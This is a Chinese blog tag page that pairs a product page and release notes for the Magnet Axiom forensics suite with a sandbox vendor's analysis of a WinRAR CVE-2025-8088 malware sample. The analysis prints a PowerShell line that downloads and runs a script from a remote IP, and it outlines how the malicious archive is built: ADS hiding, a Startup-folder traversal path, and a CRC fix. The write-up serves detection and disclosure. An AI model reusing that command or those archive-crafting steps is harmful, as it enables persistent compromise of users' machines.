标签 NTFS 下的文章

Magnet Axiom 9.10 for Windows x64 Multilingual - 数字取证与分析

Digital Forensic Software

请访问原文链接:https://sysin.org/blog/magnet-axiom/ 查看最新版。原创作品,转载请保留出处。

作者主页:sysin.org


Magnet Axiom

形象标识

在一个案件中恢复并分析所有的证据

在一个案件文件中,同时检查来自移动设备、云端、计算机和车辆来源的数字证据,以及第三方提取数据。使用强大且直观的分析工具,自动快速呈现与案件相关的证据。

产品图像

新工具如何消除干扰寻找证据

涉及调查的数字设备数量正在增长,平均每人约有六台设备*,这使得取证、处理和分析在后勤上变得复杂、耗时且成本高昂。像 Axiom 这样的工具让调查人员能够简化工作流程 (sysin),从大量数字干扰中快速定位、恢复和收集证据。

*2022 年 IDC MarketScape

新增功能

📌 Magnet Axiom 9.10.0.47249 发行说明(2026-01-27)

🆕 新增取证项(New Artifacts)

  • Cloud ChatGPT 群聊(云端)– 支持 Cloud ChatGPT 群聊数据获取。
  • Cloud ChatGPT 群组成员(云端)– 支持群组成员信息获取。
  • Microsoft Teams 消息附件(iOS)– 支持获取 Teams 消息的附件。
  • Whoo 位置数据(iOS)– 支持 Whoo 位置记录获取 (sysin)。
  • Yahoo! Japan Auctions(Android / iOS)– 支持 Yahoo! 日本竞拍的搜索历史与浏览历史。
  • Yahoo! Route Search(iOS)– 支持多种路由搜索相关的数据,如登记的铁路线路、车站等。
  • Outlook 11 邮件(电脑)– 新增对 Outlook 11 邮件内容的支持。

♻️ 更新取证项(Updated Artifacts)

以下已更新解析逻辑或字段支持:

  • iOS Apple Mail — 使用邮件服务器接收时间作为时间戳。
  • iOS Apple Maps — 更新 Apple Maps 搜索与行程数据的 protobuf 解析。
  • ChatGPT 本机用户详细信息(iOS)— 填充用户 ID 与账户 ID。
  • ChatGPT 项目详情(Android/iOS)— 改进共享项目解析 (sysin)。
  • Grindr 好友(Android)— 更新架构并更名为 Grindr Users。
  • Microsoft Teams 消息(iOS)— 将 “Account ID” 字段重命名为 “Tenant ID”。
  • Snapchat Warrant Return(云端)— 支持最新的数据结构。
  • Teams Messages 云端导出 — 更新对 Purview 导出 Teams 消息的解析。
  • Telegram(Android)— 支持 Telegram 12.2.10 和 12.3.1 版本。
  • WeChat 消息(Android)— 更新解密方式。

📂 平台功能改进(Cloud / Processing / Examining)

☁️ 云端处理(Cloud)

  • Axiom Process 现在支持 ChatGPT 获取的群聊。
  • 多参与者 ChatGPT 对话可正确标识每位发送者。
  • ChatGPT 消息现在可在 Connections 视图中显示。

⚙️ 处理(Processing)

  • 处理进度显示:Axiom Process 在处理 Express Extractions 时加入了进度指示。
  • 稳定性增强:改进 Axiom Express Extraction 的下载过程稳定性。
  • 处理加密 E01 镜像改进:对于包含空闲或损坏扇区的加密 E01 镜像,解析更加健壮。

🕵️ 检查(Examining)

  • 在解析 NTFS 的 $MFT 时,Axiom Process 现在会包括 ADS(替代数据流)

🛠 问题修复(Bug fixes)

修复了以下问题:

  • 之前,从 Magnet Graykey 镜像中自动发现的 Keychain / Keystore 可能无法在 Axiom Process 中自动填充。注意:请在安装 AppLogic 7.5 之前升级到 Magnet Axiom 9.10,以确保 Magnet Graykey 镜像的处理不受影响。 - -ENGN-14520
  • 之前,用于 Axiom Express Extractions 的 iOS Graykey 镜像中,可能缺少预期的 keychain.plist 文件。 - -ENGN-14653
  • 之前,在解析 $MFT** 时,可能未包含具有多个 **$30 属性重复 MFT 索引 的命中结果。 - -EXE-1494
  • 之前,无法在 Download Status(下载状态) 界面中移除 Magnet Nexus agent 的端点。 - -EXE-1350
  • 之前,在启动后更新 Axiom 许可证,可能导致 Comae 内存分析流程 产生扫描错误。 - -EXE-1486
  • 之前,Axiom Process 可能会为 macOS 回收站(Trash)文件 分配非唯一的哈希值 (sysin)。 - -CARS-1743
  • 之前,Axiom Process 在处理 Chromium 相关取证项 时可能需要更长时间。 - -CARS-1729
  • 之前,重复条目 可能导致 Mbox 采集 的处理失败。 - -CARS-1790
  • 之前,在 Android 平台上,Instagram 私信(Direct Messages) 的线程视图中可能显示的是 User ID 而不是 用户名(Username)。 - -MARS-2326
  • 之前,iOS Private Photo Vault 的解密可能会失败。 - -MARS-3602
  • 之前,Telegram预取文件(prefetched files) 未被处理。 - -CARS-1700

在进行 Apple 账户采集 时,反复点击 “Check Passcode” 按钮可能导致 Axiom Process 崩溃。 - -CA-3638

  • 之前,采集 iCloud 备份 时可能会触发 溢出异常(overflow exception)。 - -CA-904
  • 之前,在进行 云端 Facebook Public 账户采集 时,如果遇到重复的时间线数据,Axiom Process 可能会变得无响应。 - -CA-3549
  • 之前,Axiom Process 可能无法解析 Snapchat Warrant Return 消息。 - -CLA-262
  • 之前,在进行 Instagram 私有账户采集 时,Axiom Process 可能无法获取私信(Direct Messages)。 - -CA-3537
  • 之前,如果在 Google 账户采集 中选择 Google Apps 作为数据源,Axiom Process 可能会崩溃。 - -CA-3612
  • 之前,在 Instagram – Download Your Data 数据中,表情符号(emoji) 可能无法正确显示。 - -CLA-327
  • 之前,从 Apple Warrant Return 获取的 iMessage 中,部分消息可能错误地显示为 “unknown direction”(未知方向)。 - -CLA-256
  • 之前,在进行 WhatsApp 采集 时,二维码(QR)手机验证码(Phone code) 认证方式可能会失败。 - -CA-3526
  • 之前,当将 Axiom 语言首选项 设置为 日语 时,部分日文文本可能无法正确显示。 - -CA-3806

Axiom 功能简介

使用 Magnet Axiom,在一个案件文件中恢复、分析并报告来自移动设备、计算机、云端和车辆的数据信息。

  • 强大的数据提取能力
  • 移动端工作流
  • 高级分析工具
  • Magnet One 增强支持

强大的数据提取能力

数据提取界面

轻松恢复已删除的数据,并以“数据工件优先”的方式在一个案件文件中分析来自移动设备、计算机、云端和车辆的数字证据。发现文件或工件的完整历史,以构建案件并证明意图。Magnet Axiom 为最新设备和数据来源提供最及时的数据工件支持。

关键要点

  1. 在同一案件中获取并分析来自移动设备、云端和计算机的证据。
  2. 处理来自 Google、Facebook 和 Instagram 等提供商的授权数据返回。
  3. 检查来自云端来源(如 Google、WhatsApp 等)的开源和用户账户数据。
  4. 从提取、数据恢复到案件文件构建,一步完成图像处理。

移动端工作流

移动端工作流

无论你使用哪种提取工具,Magnet Axiom 都能获取最多的数据,并为 iOS 和 Android 设备提供最佳的分析效果。随着 Magnet Graykey 直接集成到 Axiom 中,加载移动端证据进行深度分析变得更加轻松。

关键要点

  1. 接收并处理移动设备提取内容,直接集成 Magnet Graykey,并支持 Cellebrite、Oxygen、Berla 等第三方工具。
  2. Axiom 直观的 Mobile View 视图帮助你和相关人员在 Axiom 与 Portable Case 中轻松浏览和交互移动证据。
  3. 利用 Axiom 内强大的数据雕刻功能,发现图片、聊天记录和浏览历史。
  4. 通过 KnowledgeC、Android Motion Photos、iOS Wallet、Samsung myFiles、地理位置数据等工件,揭示详细的主体信息。
  5. 利用移动设备的令牌和钥匙串进行自动解密。

高级分析工具

Magnet AXIOM 产品界面

通过 Magnet Axiom 的分析工具自动发现更多证据,让你专注于案件相关信息。借助 Magnet CopilotMedia ExplorerCloud Insights DashboardMagnet.AIConnectionsTimelineEmail Explorer 等功能 (sysin),快速找到所需证据。

关键要点

  1. 使用 Magnet.AIThorn 等机器学习工具自动检测潜在的非法图片,如儿童虐待、毒品和武器内容。
  2. 使用 Connections 快速了解工件、人物或设备之间的关联。
  3. 借助 Media Explorer 从图像和视频中快速提取智能洞察。
  4. 使用 Timeline 可视化所有证据来源中的事件。
  5. 按日期、时间范围、特定工件或关键词筛选数据,快速找到相关证据。
  6. 通过早期访问 Magnet Copilot 等新 AI 工具,快速识别深度伪造媒体并提取相关证据。

借助 Magnet One 提升效率与协作

Magnet One

将 Axiom 与其他数字取证解决方案整合,贯穿整个工作流程,实现更快速、更高效的调查。Magnet One 可轻松简化工作流程 (sysin),并支持取证人员、调查员、检察官、指挥人员和机构领导之间的无缝协作。

关键要点

  1. 轻松提交数字取证实验室请求并创建案件,节省时间与精力。
  2. 通过互联的工作流程减少手动步骤,提高工作效率。
  3. 在每个阶段监控 Axiom 处理任务进度,处理完成后自动通知调查人员。
  4. 与调查团队实时协作,确保所有人都能保持同步。

下载地址

Magnet Axiom 9.10.0.47249 for Windows x64 Multilingual (内置简体中文和繁体中文界面语言)

请访问:https://sysin.org/blog/magnet-axiom/

相关产品:

更多:HTTP 协议与安全

一、简介

近期,WinRAR 曝出存在目录穿越漏洞(CVE-2025-8088),攻击者可构造恶意压缩包实现目录穿越,将任意文件写入到系统盘的任意位置。攻击者利用此漏洞可将恶意载荷(Payload)释放到 Windows 系统的“启动”文件夹下,当用户下次登录系统时,恶意代码将被自动执行,攻击者可获得主机的持久化控制权。该漏洞影响所有版本号 < 7.13 的 WinRAR,建议各位读者立即升级至 WinRAR 7.13 或更高版本。

自漏洞曝出,天穹团队积极扫描线上样本,检测到存在利用 CVE-2025-8088 的压缩包恶意样本,沙箱已于第一时间对该攻击样本进行分析,并确认天穹沙箱可以有效检测利用此漏洞的恶意行为,保护用户免受其害。

二、样本信息

  • 样本名:【内部资料】研发部门员工薪资单.rar
  • SHA1:67F6B3530D0D017040873246B4A592F09470FFCC
  • 文件类型:RAR Archive Data (v5)
  • 诱饵文件:【内部资料】研发部门员工薪资单.txt
  • 关联载荷:start.bat

三、样本分析

行为分析

该压缩包内部包含一个名为【内部资料】研发部门员工薪资单.txt的诱饵文件和一个名为 start.bat 的 Payload 文件,使用包含 CVE-2025-8088 漏洞的 WinRAR 解压该样本时将执行以下操作:

  • 在当前目录释放诱饵文件【内部资料】研发部门员工薪资单.txt
  • 在用户自启动目录释放 start.bat 文件,其内容为远程执行 PS1 文件。

当受害者重启电脑后,释放在自启动目录的 bat 文件会被执行触发恶意行为。

沙箱分析

将该样本投递至天穹沙箱,从压缩包检测部分可以看到,沙箱准确识别出漏洞信息诱饵文件恶意载荷路径,如图1所示。

图1 压缩包检测

通过动态分析可以看到,沙箱检测到样本将 start.bat 写入 c:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ 目录,且进程的执行者为 winrar.exe,如图2所示。

图2 创建开启自启动脚本

单独分析 BAT 脚本,解密后其主体内容如下:

1IEX (New-Object System.Net.WebClient).DownloadString(‘http://47.82.111.137:666/reflection.ps1’)

由动态分析进程树部分可见,沙箱捕获到样本执行 Powershell 命令,如图3所示。

图3 执行Powershell命令

样本尝试下载并执行该 ps1 文件,如图4所示。

图4 远程下载ps1脚本并执行

由于该下载地址已死亡,无法进一步分析后续行为。

漏洞利用攻击链分析

该漏洞的核心利用方式是将 RAR5 文件头篡改与 NTFS 备用数据流(ADS)相结合。

  1. 载荷隐藏:攻击者首先将恶意载荷(如 1.bat )附加到一个无害的诱饵文件(如 decoy.txt )的 NTFS 备用数据流(ADS)中,这使得载荷在文件管理器中不可见,增加了隐蔽性。
  2. 构造基础包:攻击者使用官方的 WinRAR 命令行工具,将被附加了 ADS 的诱饵文件正常打包。这一步骤中 RAR 文件会记录下 ADS 的流名称,需要注意的是,WinRAR 在打包时禁止写入 ../ 这类可能造成目录穿越的路径,所以此处会先用占位符填充,如 X,但需要保证路径长度和修改后的路径长度一致,这样便于后续填充,如图5所示。
图5 原始RAR文件
  1. 路径篡改:这是最关键的一步。攻击者以二进制方式打开上一步骤生成的 RAR 文件,在文件头(File Header)中搜索记录 ADS 流名称的位置,并将其替换为精心构造的路径遍历字符串,例如:..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.bat
  2. 校验和修复:直接修改文件头会破坏文件 CRC32 校验和,导致 WinRAR 报错。为了使恶意压缩包能够被正常解压,攻击者会重新计算被篡改过的文件头的 CRC32 值写回文件,如图6所示。
图6 修改后的RAR文件

文件分析

通过分析发现,该样本使用了 \..\..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 进行目录穿越,当用户在 DownloadsDocumentsDesktop 和其他类似目录解压时,可顺利将 bat 脚本释放到用户自启动目录,如图7所示。此攻击方式的优点是无需知晓用户名,且用户下载压缩包时通常保存的目录就在 Downloads 目录。

图7 目录穿越路径

四、IOC

恶意文件(SHA256)

15123d998f3f2c1c6bead26f9ea102b5e46710cf1b0699f9b455a80af8e383155

恶意链接

1http[:]//47.82.111.137[:]666/reflection.ps1

报告链接

漏洞利用分析报告:天穹沙箱分析报告

压缩包文件分析报告:天穹沙箱分析报告